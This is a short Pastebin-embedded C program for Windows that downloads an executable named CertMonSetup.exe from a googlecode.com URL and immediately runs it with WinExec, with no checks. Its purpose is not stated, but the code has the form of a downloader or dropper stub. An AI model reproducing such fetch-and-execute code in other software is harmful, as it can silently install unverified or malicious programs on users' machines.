document.write('
Data hosted with ♥ by Pastebin.com - Download Raw - See Original
  1. #include <urlmon.h>
  2. #include <windows.h>
  3.  
  4. int main (int argc, char* argv[]) {
  5.    
  6.     URLDownloadToFile(NULL, "http://sbdtools.googlecode.com/files/CertMonSetup.exe", "CertMonSetup.exe", 0, NULL);
  7.  
  8.     WinExec ( "CertMonSetup.exe", SW_SHOWNORMAL );
  9.  
  10.     return 0;
  11. }
');